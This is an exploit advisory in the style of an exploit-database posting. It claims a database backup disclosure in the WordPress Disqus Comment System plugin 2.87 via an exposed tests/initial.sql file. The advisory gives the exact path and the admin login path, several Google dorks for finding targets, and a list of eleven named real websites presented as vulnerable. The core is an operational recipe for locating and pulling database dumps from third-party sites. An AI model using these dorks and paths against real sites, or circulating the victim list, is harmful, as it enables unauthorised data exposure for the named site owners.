WordPress Disqus Comment System plugin version 2.87 suffers from a database disclosure vulnerability.
c4fba621e170a3a23d77cee49817ab88#################################################################################################
# Exploit Title : WordPress Disqus Comment System Plugins 2.87 Database
Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 08/12/2018
# Vendor Homepage : disqus.com ~
wordpress.org/plugins/disqus-comment-system/
# Software Download Link :
github.com/clearhead/clearhead.me/archive/master.zip
+
github.com/clearhead/clearhead.me/blob/master/wp-content/plugins/disqus-comment-system/tests/initial.sql
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.87 and 3.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/disqus-comment-system/tests/''
intext:''Greyzed Theme created by The Forge Web Creations. Powered by
WordPress.''
intext:''A(c) 2008 - 2018 Grazitti Interactive. All rights reserved''
intext:''HyTrade Marketing & ComunicaASSAPSo A(c) 2017 | Todos direitos
reservados''
intext:''A(c) 2018 Chainbit, LLC. All rights reserved''
intext:''Copyright 2015 / CIP Data Collection Ltd Company No. 10462735''
intext:''A(c) 2017 Longlife Magazine - All Rights Reserved.''
intext:''A(c) Copyright Feira Cultural 2017. Todos os direitos reservado''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
-- MySQL dump 10.13 Distrib 5.1.48, for apple-darwin10.4.0 (i386)
--
-- Host: localhost Database: wordpress
-- ------------------------------------------------------
-- Server version 5.1.48
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/disqus-comment-system/tests/initial.sql
#################################################################################################
# Example Vulnerable Sites =>
[+]
therussianlinesman.com/blog/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+]
hytrade.com.br/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] grazitti.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+]
paulsforza.com/wordpress/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+]
combbo.com.br/cmb/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] uof7.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+]
ecommerceandb2b.com/b2bblog/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+]
cipmetering.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] soogran.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+]
longlifemagz.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+]
feiracultural.art.br/wp-content/plugins/disqus-comment-system/tests/initial.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################